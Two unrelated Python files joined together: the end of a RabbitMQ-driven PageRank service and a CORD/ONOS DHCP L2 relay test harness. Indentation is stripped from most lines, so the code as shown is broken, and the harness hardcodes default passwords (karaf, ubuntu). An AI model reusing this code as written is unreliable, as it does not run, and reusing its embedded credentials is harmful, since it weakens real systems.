self.__read_only = read_only
self.__path = None
self.__write_to_disk_threshold = 256 * 1000 * 1000 # bytes
if self.__write_to_disk_threshold % 4 != 0:
            raise ValueError('BinaryStorage.__write_to_disk_threshold must be a multiple of 4!')
self.__path = path
if os.path.exists(self.__path) and not self.__read_only:
logger.warning('Deleting existing data file: {}'.format(self.__path))
os.remove(self.__path)
# The binary format is: |QID|LEN|0|1|....|LEN-1|QID|LEN|0|1|....
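    # Example (illustrative): storing key 5 with values (7, 9) appends the little-endian
    # 32-bit words |5|2|7|9| to the in-memory buffer.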
def __setitem__(self, key, value):
if self.__read_only:
return
v = int(key).to_bytes(4, 'little') + len(value).to_bytes(4, 'little')
for i in value:
v += int(i).to_bytes(4, 'little')
self.__b += v
if len(self.__b) > self.__write_to_disk_threshold:
self.__sync_to_disk()
def __sync_to_disk(self):
if self.__read_only:
return
logger.info('BinaryStorage.__sync_to_disk called!')
with open(self.__path, 'ab') as fp:
fp.write(self.__b)
self.__b = bytearray()
logger.info('BinaryStorage.__sync_to_disk done!')
def get_graph_edges(self):
self.__sync_to_disk()
with open(self.__path, 'rb') as fp:
qid = None
length = 0
count = 0
reading_qid = True
reading_len = False
for chunk in iter(partial(fp.read, self.__write_to_disk_threshold), b''):
i = 0
read = 0
while read < len(chunk):
node = chunk[i * 4 : i * 4 + 4]
if reading_qid:
qid = int.from_bytes(node, 'little')
reading_qid = False
reading_len = True
elif reading_len:
length = int.from_bytes(node, 'little')
reading_len = False
else:
graph_node = int.from_bytes(node, 'little')
count += 1
if count == length:
reading_qid = True
count = 0
yield qid, graph_node
i += 1
read += 4
class GraphBuilder:
def __init__(self):
self.__v = BinaryStorage('/data/pagerank.bin', read_only=False)
self.__count = 0
def add_relations(self, sid, objs):
self.__v[str(sid)] = objs
self.__count += len(objs)
def get_pagerank_values(self):
start = time.time()
logger.info('Started call to get_pagerank')
g = Graph()
vp = g.add_edge_list(self.__v.get_graph_edges(), hashed=True, hash_type='int')
logger.info('Delta time to build graph: {}s'.format(timedelta(seconds=(time.time() - start))))
start = time.time()
ranks = pagerank(g)
logger.info('Delta time to compute pagerank: {}s'.format(timedelta(seconds=(time.time() - start))))
for vertex in g.vertices():
qid = vp[vertex]
r = ranks[vertex]
yield qid, r
class PageRankSubscriber:
def __init__(self, dont_wait_send_ranks=False, local_only=False) -> None:
self.__ops = self.__read_options()
self.__builder = GraphBuilder()
self.__parsed = 0
self.__debug_rate = 1_000_000
self.__response_size = 200_000
self.__channel = None
self.__dont_wait = dont_wait_send_ranks
self.__local_only = local_only
def __message_callback(self, body):
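        # Incoming message layout (little-endian uint32 words): |SID|OID|OID|...
        # Bodies of 4 bytes or fewer carry no object ids and are skipped.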
if len(body) <= 4:
return
sid = struct.unpack('<I', body[:4])[0]
objs = []
s = 4
e = 8
while e <= len(body):
oid = struct.unpack('<I', body[s:e])[0]
objs.append(oid)
s += 4
e += 4
objs = tuple(objs)
self.__builder.add_relations(sid, objs)
self.__parsed += 1
if self.__parsed % self.__debug_rate == 0:
logger.debug('Current number of parsed items: {}'.format(self.__parsed))
def __publish_ranks(self, chunk, count=0):
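        # Packs the chunk of PageRankItemT entries into a PageRankResponse flatbuffer via the
        # generated object API and publishes the serialized bytes to the response queue
        # (skipped when running local-only).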
logger.info('Building and sending batch N={} of size {}'.format(count, len(chunk)))
builder = flatbuffers.Builder(initialSize=0)
i = PageRankResponseT()
i.values = chunk
table = i.Pack(builder)
builder.Finish(table)
data = builder.Output()
if not self.__local_only:
self.__ensure_send_data(self.__ops.response_queue, data)
def __ensure_send_data(self, queue, data):
while True:
try:
self.__channel.basic_publish(exchange='', routing_key=queue, body=data)
break
except Exception as ex:
logger.warning("Got exception: {}, waiting 5 seconds before next try".format(ex))
time.sleep(5)
def __publish_done(self, count):
data = bytearray()
data += (1).to_bytes(1, 'little')
data += count.to_bytes(4, 'little')
if not self.__local_only:
self.__ensure_send_data(self.__ops.response_queue, data)
def __run_pagerank(self):
start = time.time()
logger.info('Started call to __compute_and_publish_pagerank')
chunk = []
batch_count = 0
for qid, rank in self.__builder.get_pagerank_values():
i = PageRankItemT()
i.id = qid
i.rank = rank
chunk.append(i)
if len(chunk) >= self.__response_size:
self.__publish_ranks(chunk, count=batch_count)
batch_count += 1
chunk = []
if len(chunk) > 0:
self.__publish_ranks(chunk, count=batch_count)
batch_count += 1
self.__publish_done(batch_count)
logger.info('Total number of batches: {}'.format(batch_count))
logger.info('Delta time in __compute_and_publish_pagerank: {}s'.format(timedelta(seconds=(time.time() - start))))
def __compute_and_publish_pagerank(self):
th = threading.Thread(target=self.__run_pagerank)
th.daemon = True
th.start()
def __setup_connection(self):
parameters = pika.URLParameters(self.__ops.amp_host)
self.__con = pika.SelectConnection(
parameters=parameters,
on_open_callback=self.__on_connection_open,
on_open_error_callback=self.__on_close_error,
on_close_callback=self.__on_close_error
)
def __on_close_error(self, connection, ex):
logger.warning('Connection closed: {}! Connecting again'.format(ex))
time.sleep(5)
raise ReconnectionException()
def __on_channel_ready(self, channel):
channel.queue_declare(queue=self.__ops.ids_queue)
channel.queue_declare(queue=self.__ops.request_queue)
channel.queue_declare(queue=self.__ops.response_queue)
build_callback = lambda ch, method, props, body: self.__message_callback(body)
compute_callback = lambda ch, method, props, body: self.__compute_and_publish_pagerank()
channel.basic_consume(queue=self.__ops.ids_queue, on_message_callback=build_callback, auto_ack=True)
channel.basic_consume(queue=self.__ops.request_queue, on_message_callback=compute_callback, auto_ack=True)
logger.info('Connection Ready')
self.__channel = channel
if self.__dont_wait:
self.__compute_and_publish_pagerank()
def __on_connection_open(self, connection):
connection.channel(on_open_callback=self.__on_channel_ready)
def run(self):
if self.__local_only:
self.__compute_and_publish_pagerank()
return
while True:
try:
logger.info("Starting a new ioloop")
self.__setup_connection()
self.__con.ioloop.start()
except KeyboardInterrupt:
self.__con.close()
break
except ReconnectionException:
if not self.__con.is_closed:
self.__con.close()
def __read_options(self) -> ProgramOptions:
return ProgramOptions()
if __name__ == '__main__':
logger.remove()
logger.add(sys.stderr, level='DEBUG', enqueue=True)
logger.info('Starting. Running in Python {}'.format(platform.python_version()))
sub = PageRankSubscriber(dont_wait_send_ranks=False, local_only=False)
sub.run()
logger.info('Done')
|
dhcpl2relayTest.py
|
# Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Copyright 2016-present Ciena Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
from nose.tools import *
from nose.twistedtools import reactor, deferred
from twisted.internet import defer
import time
import os, sys, re, json
from DHCP import DHCPTest
from CordTestUtils import get_mac, log_test, getstatusoutput, get_controller, get_controllers
from SSHTestAgent import SSHTestAgent
from OnosCtrl import OnosCtrl
from onosclidriver import OnosCliDriver
from OltConfig import OltConfig
from CordTestServer import cord_test_onos_restart, cord_test_ovs_flow_add,cord_test_onos_shutdown
from CordTestConfig import setup_module, teardown_module
from CordLogger import CordLogger
from portmaps import g_subscriber_port_map
from CordContainer import Onos
from VolthaCtrl import VolthaCtrl
import threading, random
from threading import current_thread
import requests
log_test.setLevel('INFO')
class dhcpl2relay_exchange(CordLogger):
VOLTHA_HOST = None
VOLTHA_REST_PORT = VolthaCtrl.REST_PORT
VOLTHA_ENABLED = bool(int(os.getenv('VOLTHA_ENABLED', 0)))
VOLTHA_OLT_TYPE = 'simulated_olt'
VOLTHA_OLT_MAC = '00:0c:e2:31:12:00'
VOLTHA_UPLINK_VLAN_MAP = { 'of:0000000000000001' : '222' }
TAGGED_TRAFFIC = False
app = 'org.opencord.dhcpl2relay'
sadis_app = 'org.opencord.sadis'
app_dhcp = 'org.onosproject.dhcp'
app_olt = 'org.onosproject.olt'
relay_interfaces = ()
relay_interfaces_last = ()
interface_to_mac_map = {}
relay_vlan_map = {}
host_ip_map = {}
test_path = os.path.dirname(os.path.realpath(__file__))
dhcp_data_dir = os.path.join(test_path, '..', 'setup')
dhcpl2_app_file = os.path.join(test_path, '..', 'apps/dhcpl2relay-1.0.0.oar')
olt_app_file = os.path.join(test_path, '..', 'apps/olt-app-3.0-SNAPSHOT.oar')
sadis_app_file = os.path.join(test_path, '..', 'apps/sadis-app-1.0.0-SNAPSHOT.oar')
olt_conf_file = os.getenv('OLT_CONFIG_FILE', os.path.join(test_path, '..', 'setup/olt_config_voltha_local.json'))
default_config = { 'default-lease-time' : 600, 'max-lease-time' : 7200, }
default_options = [ ('subnet-mask', '255.255.255.0'),
('broadcast-address', '192.168.1.255'),
('domain-name-servers', '192.168.1.1'),
('domain-name', '"mydomain.cord-tester"'),
]
default_subnet_config = [ ('192.168.1.2',
'''
subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.10 192.168.1.100;
}
'''), ]
lock = threading.Condition()
ip_count = 0
failure_count = 0
start_time = 0
diff = 0
transaction_count = 0
transactions = 0
running_time = 0
total_success = 0
total_failure = 0
#just in case we want to reset ONOS to default network cfg after relay tests
onos_restartable = bool(int(os.getenv('ONOS_RESTART', 0)))
configs = {}
sadis_configs = {}
default_onos_netcfg = {}
voltha_switch_map = None
remote_dhcpd_cmd = []
ONOS_INSTANCES = 3
relay_device_id = None
@classmethod
def update_apps_version(cls):
version = Onos.getVersion()
major = int(version.split('.')[0])
minor = int(version.split('.')[1])
dhcpl2_app_version = '1.0.0'
sadis_app_version = '3.0-SNAPSHOT'
cls.dhcpl2_app_file = os.path.join(cls.test_path, '..', 'apps/dhcpl2relay-{}.oar'.format(dhcpl2_app_version))
cls.sadis_app_file = os.path.join(cls.test_path, '..', 'apps/sadis-app-{}.oar'.format(sadis_app_version))
@classmethod
def setUpClass(cls):
''' Activate the cord dhcpl2relay app'''
cls.update_apps_version()
OnosCtrl(cls.app_dhcp).deactivate()
time.sleep(3)
cls.onos_ctrl = OnosCtrl(cls.app)
status, _ = cls.onos_ctrl.activate()
#assert_equal(status, True)
time.sleep(3)
status, _ = OnosCtrl(cls.sadis_app).activate()
#assert_equal(status, True)
time.sleep(3)
cls.setup_dhcpd()
cls.default_onos_netcfg = OnosCtrl.get_config()
def setUp(self):
super(dhcpl2relay_exchange, self).setUp()
#self.dhcp_l2_relay_setup()
#self.cord_sadis_load()
#self.cord_l2_relay_load()
def tearDown(self):
super(dhcpl2relay_exchange, self).tearDown()
#OnosCtrl.uninstall_app(self.dhcpl2_app_file)
#OnosCtrl.uninstall_app(self.sadis_app_file)
#OnosCtrl.uninstall_app(self.olt_app_file)
@classmethod
def tearDownClass(cls):
'''Deactivate the cord dhcpl2relay app'''
cls.onos_load_config(cls.default_onos_netcfg)
#cls.onos_ctrl.deactivate()
#OnosCtrl(cls.sadis_app).deactivate()
#OnosCtrl(cls.app_olt).deactivate()
@classmethod
def setup_dhcpd(cls, boot_delay = 5):
device_details = OnosCtrl.get_devices(mfr = 'Nicira')
        ## Assuming only one OVS is detected on ONOS and it's for the external DHCP server connect point...
if device_details is not None:
did_ovs = device_details[0]['id']
else:
            log_test.info('On this DHCPl2relay setup, onos does not have an OVS device providing the external DHCP server connect point, so returning with false status')
return False
cls.relay_device_id = did_ovs
device_details = OnosCtrl.get_devices()
if device_details is not None:
for device in device_details:
if device['available'] is True and device['driver'] == 'voltha':
cls.olt_serial_id = "{}".format(device['serial'])
break
else:
cls.olt_serial_id = " "
else:
            log_test.info('On this DHCPl2relay setup, onos does not have an OVS device providing the external DHCP server connect point, so returning with false status')
return False
if cls.service_running("/usr/sbin/dhcpd"):
print('DHCPD already running in container')
return True
setup_for_relay = cls.dhcp_l2_relay_setup()
cls.cord_l2_relay_load()
cls.voltha_setup()
return True
# dhcp_start_status = cls.dhcpd_start()
# if setup_for_relay and dhcp_start_status:
# return True
# return False
@classmethod
def config_olt(cls, switch_map):
controller = get_controller()
auth = ('karaf', 'karaf')
#configure subscriber for every port on all the voltha devices
for device, device_map in switch_map.iteritems():
uni_ports = device_map['ports']
uplink_vlan = device_map['uplink_vlan']
for port in uni_ports:
vlan = port
rest_url = 'http://{}:8181/onos/olt/oltapp/{}/{}/{}'.format(controller,
device,
port,
vlan)
requests.post(rest_url, auth = auth)
@classmethod
def voltha_setup(cls):
s_tag_map = {}
#configure olt app to provision dhcp flows
cls.config_olt(cls.voltha_switch_map)
for switch, switch_map in cls.voltha_switch_map.iteritems():
s_tag_map[int(switch_map['uplink_vlan'])] = map(lambda p: int(p), switch_map['ports'])
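        # Build a QinQ-style chain of VLAN sub-interfaces on the relay interface, roughly
        # (illustrative) relay_intf -> relay_intf.<s_tag> -> relay_intf.<s_tag>.<port>,
        # bring each link up, then add matching OVS flows for every s-tag below.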
cmd_list = []
relay_interface = cls.relay_interfaces[0]
cls.relay_vlan_map[relay_interface] = []
for s_tag, ports in s_tag_map.iteritems():
vlan_stag_intf = '{}.{}'.format(relay_interface, s_tag)
cmd = 'ip link add link %s name %s type vlan id %d' %(relay_interface, vlan_stag_intf, s_tag)
cmd_list.append(cmd)
cmd = 'ip link set %s up' %(vlan_stag_intf)
cmd_list.append(cmd)
for port in ports:
vlan_ctag_intf = '{}.{}.{}'.format(relay_interface, s_tag, port)
cmd = 'ip link add link %s name %s type vlan id %d' %(vlan_stag_intf, vlan_ctag_intf, port)
cmd_list.append(cmd)
cmd = 'ip link set %s up' %(vlan_ctag_intf)
cmd_list.append(cmd)
cls.relay_vlan_map[relay_interface].append(vlan_ctag_intf)
cls.relay_vlan_map[relay_interface].append(vlan_stag_intf)
for cmd in cmd_list:
log_test.info('Running command: %s' %cmd)
os.system(cmd)
cord_test_ovs_flow_add(cls.relay_interface_port)
for s_tag in s_tag_map.keys():
log_test.info('Configuring OVS flow for port %d, s_tag %d' %(cls.relay_interface_port, s_tag))
cord_test_ovs_flow_add(cls.relay_interface_port, s_tag)
@classmethod
def service_running(cls, pattern):
st, output = getstatusoutput('pgrep -f "{}"'.format(pattern))
return True if st == 0 else False
@classmethod
def dhcpd_conf_generate(cls, config = default_config, options = default_options,
subnet = default_subnet_config):
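        # With the class defaults above, the generated dhcpd.conf body looks roughly like
        # (illustrative):
        #   default-lease-time 600;
        #   max-lease-time 7200;
        #   option subnet-mask 255.255.255.0;
        #   option broadcast-address 192.168.1.255;
        #   ...
        #   subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.10 192.168.1.100; }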
conf = ''
for k, v in config.items():
conf += '{} {};\n'.format(k, v)
opts = ''
for k, v in options:
opts += 'option {} {};\n'.format(k, v)
subnet_config = ''
for _, v in subnet:
subnet_config += '{}\n'.format(v)
return '{}{}{}'.format(conf, opts, subnet_config)
@classmethod
def dhcpd_start(cls, intf_list = None,
config = default_config, options = default_options,
subnet = default_subnet_config):
'''Start the dhcpd server by generating the conf file'''
if intf_list is None:
intf_list = cls.relay_interfaces
intf_list = list(intf_list)
##stop dhcpd if already running
#cls.dhcpd_stop()
dhcp_conf = cls.dhcpd_conf_generate(config = config, options = options,
subnet = subnet)
##first touch dhcpd.leases if it doesn't exist
lease_file = '{}/dhcpd.leases'.format(cls.dhcp_data_dir)
if os.access(lease_file, os.F_OK) is False:
with open(lease_file, 'w') as fd: pass
lease_file_tagged = '{}/dhcpd-tagged.leases'.format(cls.dhcp_data_dir)
if os.access(lease_file_tagged, os.F_OK) is False:
with open(lease_file_tagged, 'w') as fd: pass
conf_file = '{}/dhcpd.conf'.format(cls.dhcp_data_dir)
with open(conf_file, 'w') as fd:
fd.write(dhcp_conf)
conf_file_tagged = '{}/dhcpd-tagged.conf'.format(cls.dhcp_data_dir)
with open(conf_file_tagged, 'w') as fd:
fd.write(dhcp_conf)
#now configure the dhcpd interfaces for various subnets
index = 0
intf_info = []
vlan_intf_list = []
for ip,_ in subnet:
vlan_intf = None
intf = intf_list[index]
if intf in cls.relay_vlan_map:
vlan_intf = cls.relay_vlan_map[intf][0]
vlan_intf_list.append(vlan_intf)
mac = cls.get_mac(intf)
intf_info.append((ip, mac))
index += 1
cmd = 'ifconfig {} {}'.format(intf, ip)
status = os.system(cmd)
if vlan_intf:
cmd = 'ifconfig {} {}'.format(vlan_intf, ip)
os.system(cmd)
intf_str = ','.join(intf_list)
dhcpd_cmd = '/usr/sbin/dhcpd -4 --no-pid -cf {0} -lf {1} {2}'.format('/root/test/src/test/setup/dhcpd.conf','/root/test/src/test/setup/dhcpd.leases', intf_str)
print('Starting DHCPD server with command: %s' %dhcpd_cmd)
status = os.system(dhcpd_cmd)
vlan_intf_str = ','.join(vlan_intf_list)
dhcpd_cmd = '/usr/sbin/dhcpd -4 --no-pid -cf {0} -lf {1} {2}'.format('/root/test/src/test/setup/dhcpd-tagged.conf','/root/test/src/test/setup/dhcpd-tagged.leases', vlan_intf_str)
print('Starting DHCPD server with command: %s' %dhcpd_cmd)
status = os.system(dhcpd_cmd)
        if status > 255:
            status = 1
        if status != 0:
            return False
time.sleep(3)
cls.relay_interfaces_last = cls.relay_interfaces
cls.relay_interfaces = intf_list
return True
@classmethod
def get_dhcpd_process(cls):
docker_cmd = 'docker exec cord-tester1'
cmd = '{} ps -eaf | grep dhcpd'.format(docker_cmd)
dhcpd_server_ip = get_controller()
server_user = 'ubuntu'
server_pass = 'ubuntu'
        ssh_agent = SSHTestAgent(host = dhcpd_server_ip, user = server_user, password = server_pass)
status, output = ssh_agent.run_cmd(cmd)
assert_equal(status, True)
if output:
cls.remote_dhcpd_cmd = re.findall('(?<=/)\w+.*', output)
log_test.info('DHCP server running on remote host and list of service commands are \n %s'%cls.remote_dhcpd_cmd)
assert_equal(status, True)
return cls.remote_dhcpd_cmd
    def dhcpd_stop(self, remote_controller = False, dhcpd = None):
        if remote_controller is not True:
            if self.service_running("/usr/sbin/dhcpd"):
                cmd = 'pkill -9 dhcpd'
                st, _ = getstatusoutput(cmd)
                return True if st == 0 else False
        else:
            docker_cmd = 'docker exec cord-tester1'
            dhcpd_server_ip = get_controller()
            server_user = 'ubuntu'
            server_pass = 'ubuntu'
            service_status = True
            ssh_agent = SSHTestAgent(host = dhcpd_server_ip, user = server_user, password = server_pass)
            if dhcpd == 'stop':
                status, output = ssh_agent.run_cmd('{} pkill -9 dhcpd'.format(docker_cmd))
                service_status = status and True
            elif dhcpd == 'start':
                for cmd in self.remote_dhcpd_cmd:
                    dhcpd_cmd = ' {0} /{1}'.format(docker_cmd,cmd)
                    status, output = ssh_agent.run_cmd(dhcpd_cmd)
                    service_status = status and True
            elif dhcpd == 'restart':
                status, output = ssh_agent.run_cmd('{} pkill -9 dhcpd'.format(docker_cmd))
                service_status = status and True
                for cmd in self.remote_dhcpd_cmd:
                    dhcpd_cmd = ' {0} /{1}'.format(docker_cmd,cmd)
                    status, output = ssh_agent.run_cmd(dhcpd_cmd)
                    service_status = status and True
            return service_status
@classmethod
def dhcp_l2_relay_setup(cls):
device_details = OnosCtrl.get_devices(mfr = 'Nicira')
if device_details is not None:
did_ovs = device_details[0]['id']
else:
            log_test.info('On this DHCPl2relay setup, onos does not have an OVS device providing the external DHCP server connect point, so returning with false status')
return False
cls.relay_device_id = did_ovs
cls.olt = OltConfig(olt_conf_file = cls.olt_conf_file)
cls.port_map, _ = cls.olt.olt_port_map()
if cls.port_map:
##Per subscriber, we use 1 relay port
try:
relay_port = cls.port_map[cls.port_map['relay_ports'][0]]
except:
relay_port = cls.port_map['uplink']
cls.relay_interface_port = relay_port
cls.relay_interfaces = (cls.port_map[cls.relay_interface_port],)
else:
cls.relay_interface_port = 100
cls.relay_interfaces = (g_subscriber_port_map[cls.relay_interface_port],)
cls.relay_interfaces_last = cls.relay_interfaces
if cls.port_map:
##generate a ip/mac client virtual interface config for onos
interface_list = []
for port in cls.port_map['ports']:
port_num = cls.port_map[port]
if port_num == cls.port_map['uplink']:
continue
ip = cls.get_host_ip(port_num)
mac = cls.get_mac(port)
interface_list.append((port_num, ip, mac))
#configure dhcp server virtual interface on the same subnet as first client interface
relay_ip = cls.get_host_ip(interface_list[0][0])
relay_mac = cls.get_mac(cls.port_map[cls.relay_interface_port])
interface_list.append((cls.relay_interface_port, relay_ip, relay_mac))
cls.onos_interface_load(interface_list)
@classmethod
def dhcp_l2_relay_cleanup(cls):
##reset the ONOS port configuration back to default
        for config in cls.configs.values():
            OnosCtrl.delete(config)
        cls.onos_load_config(cls.default_onos_netcfg)
# if cls.onos_restartable is True:
# log_test.info('Cleaning up dhcp relay config by restarting ONOS with default network cfg')
# return cord_test_onos_restart(config = {})
@classmethod
def onos_load_config(cls, config):
status, code = OnosCtrl.config(config)
if status is False:
log_test.info('JSON request returned status %d' %code)
assert_equal(status, True)
time.sleep(3)
@classmethod
def onos_delete_config(cls, config):
status, code = OnosCtrl.delete(config)
if status is False:
log_test.info('JSON request returned status %d' %code)
assert_equal(status, True)
time.sleep(3)
@classmethod
def onos_interface_load(cls, interface_list):
interface_dict = { 'ports': {} }
for port_num, ip, mac in interface_list:
port_map = interface_dict['ports']
port = '{}/{}'.format(cls.relay_device_id, port_num)
port_map[port] = { 'interfaces': [] }
interface_list = port_map[port]['interfaces']
interface_map = { 'ips' : [ '{}/{}'.format(ip, 24) ],
'mac' : mac,
'name': 'vir-{}'.format(port_num)
}
interface_list.append(interface_map)
cls.onos_load_config(interface_dict)
cls.configs['interface_config'] = interface_dict
@classmethod
def cord_l2_relay_load(cls, dhcp_server_connectPoint = None, delete = False):
##read the current config
current_netcfg = OnosCtrl.get_config()
connect_points = set([])
try:
connect_points = set(current_netcfg['apps']['org.opencord.dhcpl2relay']['dhcpl2relay']['dhcpServerConnectPoints'])
except KeyError, e:
pass
OnosCtrl.uninstall_app(cls.dhcpl2_app_file)
relay_device_map = '{}/{}'.format(cls.relay_device_id, cls.relay_interface_port)
#### We have to work on later versions by removing these hard coded values
if dhcp_server_connectPoint is None:
relay_device_present = filter(lambda cp: cp.split('/')[0] == cls.relay_device_id, connect_points)
if not relay_device_present:
connect_points.add(relay_device_map)
else:
cps_unused = map(lambda cp: connect_points.add(cp), dhcp_server_connectPoint)
connect_points = list(connect_points)
dhcp_dict = { "apps" : { "org.opencord.dhcpl2relay" : {"dhcpl2relay" :
{"dhcpServerConnectPoints": connect_points}
}
}
}
#OnosCtrl.uninstall_app(cls.dhcpl2_app_file)
OnosCtrl.install_app(cls.dhcpl2_app_file)
if delete == False:
cls.onos_load_config(dhcp_dict)
else:
cls.onos_delete_config(dhcp_dict)
            cls.onos_load_config(cls.default_onos_netcfg)
cls.configs['relay_config'] = dhcp_dict
@classmethod
def cord_sadis_load(cls, sadis_info = None):
relay_device_id = '{}'.format(cls.relay_device_id)
device_details = OnosCtrl.get_devices()
if device_details is not None:
for device in device_details:
                ## Assuming only one OVS is detected on ONOS and it's for the external DHCP server connect point...
if device['available'] is True and device['driver'] == 'voltha':
cls.olt_serial_id = "{}".format(device['serial'])
else:
cls.olt_serial_id = " "
else:
            log_test.info('On this DHCPl2relay setup, onos does not have a Tibit device where the DHCP client is connected on the UNI point, so returning with false status')
return False
sadis_dict = { "apps": {
"org.opencord.sadis": {
"sadis": {
"integration": {
"cache": {
"enabled": "true",
"maxsize": 50,
"ttl": "PT1m"
}
},
"entries": [{
"id": "uni-254",
"cTag": 202,
"sTag": 222,
"nasPortId": "uni-254"
},
{
"id": cls.olt_serial_id,
"hardwareIdentifier": "00:0c:e2:31:05:00",
"ipAddress": "172.17.0.1",
"nasId": "B100-NASID"
}
]
}
}
}
}
#OnosCtrl.uninstall_app(cls.olt_app_file)
OnosCtrl.install_app(cls.olt_app_file)
time.sleep(5)
#OnosCtrl.uninstall_app(cls.sadis_app_file)
OnosCtrl.install_app(cls.sadis_app_file)
if sadis_info:
sadis_dict = sadis_info
cls.onos_load_config(sadis_dict)
cls.sadis_configs['relay_config'] = sadis_dict
def sadis_info_dict(self, subscriber_port_id =None, c_tag = None, s_tag = None, nas_port_id =None,olt_serial_id =None,olt_mac=None,olt_ip =None,olt_nas_id=None):
### Need to work on these hard coded values on later merges
if subscriber_port_id is None:
subscriber_port_id = "uni-254"
if c_tag is None:
c_tag = 202
if s_tag is None:
s_tag = 222
if nas_port_id is None:
nas_port_id = "uni-254"
if olt_serial_id is None:
olt_serial_id = self.olt_serial_id
if olt_mac is None:
olt_mac = "00:0c:e2:31:05:00"
if olt_ip is None:
olt_ip = "172.17.0.1"
if olt_nas_id is None:
olt_nas_id = "B100-NASID"
sadis_dict = { "apps": {
"org.opencord.sadis": {
"sadis": {
"integration": {
"cache": {
"enabled": "true",
"maxsize": 50,
"ttl": "PT1m"
}
},
"entries": [{
"id": subscriber_port_id,
"cTag": c_tag,
"sTag": s_tag,
"nasPortId": nas_port_id
},
{
"id": olt_serial_id,
"hardwareIdentifier": olt_mac,
"ipAddress": olt_ip,
"nasId": olt_nas_id
}
]
}
}
}
}
return sadis_dict
@classmethod
def get_host_ip(cls, port):
if cls.host_ip_map.has_key(port):
return cls.host_ip_map[port]
cls.host_ip_map[port] = '192.168.100.{}'.format(port)
return cls.host_ip_map[port]
@classmethod
def host_load(cls, iface):
'''Have ONOS discover the hosts for dhcp-relay responses'''
port = g_subscriber_port_map[iface]
host = '173.17.1.{}'.format(port)
cmds = ( 'ifconfig {} 0'.format(iface),
'ifconfig {0} {1}'.format(iface, host),
'arping -I {0} {1} -c 2'.format(iface, host),
'ifconfig {} 0'.format(iface), )
for c in cmds:
os.system(c)
@classmethod
def get_mac(cls, iface):
if cls.interface_to_mac_map.has_key(iface):
return cls.interface_to_mac_map[iface]
mac = get_mac(iface, pad = 0)
cls.interface_to_mac_map[iface] = mac
return mac
def dhcpl2relay_stats_calc(self, success_rate = False, only_discover = False, iface = 'veth0'):
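        # Repeatedly runs DHCP discovers (or full discover/request cycles) on the given interface
        # for about 60 seconds, counting successes and failures to derive a transactions-per-second rate.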
self.ip_count = 0
self.failure_count = 0
self.start_time = 0
self.diff = 0
self.transaction_count = 0
mac = self.get_mac(iface)
self.dhcp = DHCPTest(seed_ip = '182.17.0.1', iface = iface)
self.start_time = time.time()
while self.diff <= 60:
if only_discover:
cip, sip, mac, _ = self.dhcp.only_discover(multiple = True)
log_test.info('Got dhcp client IP %s from server %s for mac %s' %
(cip, sip, mac))
else:
cip, sip = self.send_recv(mac=mac, update_seed = True, validate = False)
if cip:
self.ip_count +=1
elif cip == None:
self.failure_count += 1
log_test.info('Failed to get ip')
if success_rate and self.ip_count > 0:
break
self.diff = round(time.time() - self.start_time, 0)
self.transaction_count = round((self.ip_count+self.failure_count)/self.diff, 2)
self.transactions += (self.ip_count+self.failure_count)
self.running_time += self.diff
self.total_success += self.ip_count
self.total_failure += self.failure_count
def send_recv(self, mac=None, update_seed = False, validate = True):
cip, sip = self.dhcp.discover(mac = mac, update_seed = update_seed)
if validate:
assert_not_equal(cip, None)
assert_not_equal(sip, None)
log_test.info('Got dhcp client IP %s from server %s for mac %s' %
(cip, sip, self.dhcp.get_mac(cip)[0]))
return cip,sip
def cliEnter(self, controller = None):
retries = 0
while retries < 30:
self.cli = OnosCliDriver(controller = controller, connect = True)
if self.cli.handle:
break
else:
retries += 1
time.sleep(2)
def cliExit(self):
self.cli.disconnect()
def verify_cluster_status(self,controller = None,onos_instances=ONOS_INSTANCES,verify=False):
tries = 0
try:
self.cliEnter(controller = controller)
while tries <= 10:
cluster_summary = json.loads(self.cli.summary(jsonFormat = True))
if cluster_summary:
log_test.info("cluster 'summary' command output is %s"%cluster_summary)
nodes = cluster_summary['nodes']
if verify:
if nodes == onos_instances:
self.cliExit()
return True
else:
tries += 1
time.sleep(1)
else:
if nodes >= onos_instances:
self.cliExit()
return True
else:
tries += 1
time.sleep(1)
else:
tries += 1
time.sleep(1)
self.cliExit()
return False
except:
raise Exception('Failed to get cluster members')
return False
def get_cluster_current_member_ips(self, controller = None, nodes_filter = None):
tries = 0
cluster_ips = []
try:
self.cliEnter(controller = controller)
while tries <= 10:
cluster_nodes = json.loads(self.cli.nodes(jsonFormat = True))
if cluster_nodes:
log_test.info("cluster 'nodes' output is %s"%cluster_nodes)
if nodes_filter:
cluster_nodes = nodes_filter(cluster_nodes)
cluster_ips = map(lambda c: c['id'], cluster_nodes)
self.cliExit()
cluster_ips.sort(lambda i1,i2: int(i1.split('.')[-1]) - int(i2.split('.')[-1]))
return cluster_ips
else:
tries += 1
self.cliExit()
return cluster_ips
except:
raise Exception('Failed to get cluster members')
return cluster_ips
def get_cluster_container_names_ips(self,controller=None):
onos_names_ips = {}
controllers = get_controllers()
i = 0
for controller in controllers:
if i == 0:
name = Onos.NAME
else:
name = '{}-{}'.format(Onos.NAME, i+1)
onos_names_ips[controller] = name
onos_names_ips[name] = controller
i += 1
return onos_names_ips
def get_cluster_current_master_standbys(self,controller=None,device_id=relay_device_id):
master = None
standbys = []
tries = 0
try:
cli = self.cliEnter(controller = controller)
while tries <= 10:
roles = json.loads(self.cli.roles(jsonFormat = True))
log_test.info("cluster 'roles' command output is %s"%roles)
if roles:
for device in roles:
log_test.info('Verifying device info in line %s'%device)
if device['id'] == device_id:
master = str(device['master'])
standbys = map(lambda d: str(d), device['standbys'])
log_test.info('Master and standbys for device %s are %s and %s'%(device_id, master, standbys))
self.cliExit()
return master, standbys
break
self.cliExit()
return master, standbys
else:
tries += 1
time.sleep(1)
